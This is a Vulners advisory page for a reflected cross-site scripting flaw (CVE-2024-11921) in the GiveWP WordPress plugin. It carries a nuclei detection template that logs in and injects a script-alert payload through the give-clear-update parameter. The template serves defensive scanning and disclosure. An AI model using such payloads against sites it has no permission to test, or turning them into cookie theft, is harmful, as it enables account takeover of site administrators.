Lucene search
K

Give WP Plugin < 3.19.0 - Cross-Site Scripting

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

Give WP Plugin < 3.19.0 allows Cross-Site Scripting, update to version 3.19.0 to fix.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-11921
27 Dec 202406:15
circl
CNNVD
WordPress plugin GiveWP 安全漏洞
27 Dec 202400:00
cnnvd
CVE
CVE-2024-11921
27 Dec 202406:00
cve
Cvelist
CVE-2024-11921 Give < 3.19.0 - Reflected XSS
27 Dec 202406:00
cvelist
NVD
CVE-2024-11921
27 Dec 202406:15
nvd
OSV
CVE-2024-11921
27 Dec 202406:15
osv
Patchstack
WordPress GiveWP plugin < 3.19.0 - Reflected XSS vulnerability
27 Dec 202406:44
patchstack
Positive Technologies
PT-2024-17347
27 Dec 202400:00
ptsecurity
RedhatCVE
CVE-2024-11921
23 May 202507:52
redhatcve
Vulnrichment
CVE-2024-11921 Give < 3.19.0 - Reflected XSS
27 Dec 202406:00
vulnrichment
Rows per page
id: CVE-2024-11921

info:
  name: Give WP Plugin < 3.19.0 - Cross-Site Scripting
  author: Splint3r7
  severity: high
  description: |
    The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the give-clear-update parameter to steal WordPress administrator session cookies and credentials when high-privilege users view the forms page.
  remediation: |
    Update to the version 3.19.0 of plugin.
  reference:
    - https://wpscan.com/vulnerability/5f196294-5ba9-45b6-a27c-ab1702cc001f/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-11921
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 7.1
    cve-id: CVE-2024-11921
    cwe-id: CWE-79
    epss-score: 0.00794
    epss-percentile: 0.51962
  metadata:
    max-request: 2
  tags: cve,cve2024,wordpress,wp,wp-plugin,give,xss,authenticated,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=give-forms&give-clear-update="><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /wp-admin/admin.php?page=give-forms&give-clear-update=1"><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<script>alert(document.domain)</script>", "give_forms_page_")'
        condition: and
# digest: 4a0a0047304502200c8479a13e5913b8ca18187f8a37e6895a3b2d0ec3e68f03467a5781be6ea00c022100e78fcdf1350f84f2cf7a17b9fdc993c68ec479db1c6bbda09f407ede1234eedb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.14.8
EPSS0.00794
SSVC
30